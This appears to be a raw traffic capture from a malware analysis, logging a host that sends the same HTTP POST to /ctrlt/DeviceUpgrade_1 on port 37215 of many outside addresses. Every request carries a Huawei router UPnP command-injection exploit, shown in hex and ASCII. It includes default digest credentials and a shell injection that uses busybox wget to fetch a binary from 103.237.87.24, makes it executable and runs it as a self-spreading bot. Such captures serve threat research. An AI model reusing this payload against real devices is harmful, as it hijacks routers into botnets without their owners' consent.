2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2465192.168.2.1346128179.4.212.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633537054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2466192.168.2.1351328197.161.118.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633558035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2467192.168.2.135315241.198.229.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633620977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2468192.168.2.133694641.87.200.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633656025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2469192.168.2.1350080157.128.35.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633660078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2470192.168.2.135844241.1.229.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633958101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2471192.168.2.1353050157.77.174.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.633992910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2472192.168.2.134542689.157.76.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634040117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2473192.168.2.133487679.86.234.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634041071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2474192.168.2.1336480180.73.251.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634048939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2475192.168.2.135235075.68.203.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634115934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
